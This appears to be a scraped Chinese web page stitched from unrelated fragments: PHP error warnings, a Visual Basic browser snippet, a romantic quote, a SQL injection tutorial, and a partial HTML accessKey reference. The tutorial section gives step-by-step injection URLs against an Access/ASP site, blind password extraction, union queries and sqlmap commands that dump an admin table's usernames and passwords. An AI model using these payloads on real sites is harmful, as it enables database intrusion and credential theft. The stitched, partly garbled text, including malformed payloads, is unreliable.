Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537
要代碼:
Dim doc, objhtml As Object
Dim i As Integer
Dim strhtml As String
If Not Me.WebBrowser1.Busy Then
Set doc = WebBrowser1.Document
i = 0
Set objhtml = doc.body.createtextrange()
If Not IsNull(objhtml) Then
Text1 = objhtml.htmltext
End If
End If
?
示例下載:( 在“了解更多”里下載)
圖 示:
鐘書在《圍成》里寫到:“約著見一面,就能使見面的前后幾天都沾著光,變成好日子”,是啊,只要能見你,雀躍的心情都會被拉得好長好長。感情就是這樣,原則抵不過我樂意,你有你的打算,我有我的目的,因為我喜歡你,我所做的一切都是想跟你在一起。。。
---- 網易云熱評
一、網站分類
1、靜態網頁
html或者htm是靜態頁面,不需要服務器解析其中的腳本
特點:不依賴數據庫,靈活性差,制作、更新、維護麻煩,交互性差,功能受限制,安全,不存在數據庫注入漏洞
2、動態頁面
asp/aspx/php/jsp等,由相應的腳本引擎來解釋執行
特點:以來數據庫,靈活性好、交互性好、不安全,存在數據庫注入漏洞
二、網站訪問流程
三、漏洞產生原因
目標網址:www.aiyou.com/new.php?id=23
1、正常流程數據庫返回給網站new頁面id為23的信息
2、將參數值23修改為其他的sql語句
3、網站未對該指令進行檢測
4、服務器執行了新的語句,并返回給網站
5、客戶端根據返回的信息可以繼續進一步注入
四、sql注入的危害
1、數據庫信息泄露
2、網頁被篡改
3、網頁被掛馬
4、數據庫被惡意操作
5、服務器被遠程控制
6、破快硬盤數據
五、access數據庫
一般配合asp腳本使用,存儲數據不能大于100M,只有一個數據庫名稱,可以創建多個表
1、數據庫后綴:*.mdb
2、asp鏈接access數據庫
<%
dim conn,connstr,db
db="Your.mdb"
Set conn = Server.CreateObject("ADODB.Connection")
connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db)
conn.Open connstr
%>
3、常用打開工具EasyAccess
4、漏洞判斷
目標:http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513
判斷注入點:
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513/ 報錯,可能存在注入
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and 1=1 返回正常
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2 返回錯誤 存在注入
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exsits (select * from msysobjects) > 0 判斷access數據庫,根據錯誤提示在msysobjects上沒有讀取數據權限,說明表存在,從而知道是access數據庫
5、查詢access數據空中的表
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select * from user) 根據錯誤判斷除滅有user表
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select * from admin) 正常返回,說明存在admin表
6、判斷列名
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select password from admin),正常返回,說明存在列名password
常用用戶名:name username user_name admin adminuser admin_user admin_username adminname
常用密碼名:password pass userpass user_pass pwd userpwd adminpwd admin_pwd
7、判斷表的列數
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 ,正常返回說明有22列,如果沒有正常繼續修改該數字
8、聯合查詢
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin,知道admin表一共有22列,所以聯合查詢需要輸入1-22,頁面只顯示3和15,可以修改該兩列獲取想要的數值
六、另一種方法判斷:
1、http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and select len(password) from admin)=16 判斷密碼的長度,返回正常,說明密碼長度為16。
2、 http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,1,1)) from admin)=97 判斷密碼的第一位,返回正常,說明密碼的第一位是a
判斷第二位,成功后修改該值,依次判斷剩下的密碼
七、sqlmap工具利用
目標地址:http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513
1、測試是否存在漏洞
sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513"
2、獲取表名
sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513" --tables
3、獲取列名
sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513" --columns -T admin
4、獲取指定列的內容
sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513" -T admin -C admin,password --dump
禁止非法,后果自負
歡迎關注公眾號:web安全工具庫
義和用法
accessKey 屬性設置或返回元素的快捷鍵。
快捷鍵規定激活元素或使元素獲得焦點的快捷鍵。
注釋:在不同的瀏覽器中訪問快捷鍵的方式各有不同
IE、Chrome、Safari 使用 [Alt] + accessKey 為擁有指定快捷鍵的元素賦予焦點。
Firefox 使用 [Alt] [Shift] + accesskey 獲取焦點;
語法
HTMLElementObject.accessKey=accessKey
在Chrome瀏覽器中安Alt + S 就會獲取焦點
提示:如果超過一個元素擁有相同的快捷鍵,那么:
*請認真填寫需求信息,我們會在24小時內與您取得聯系。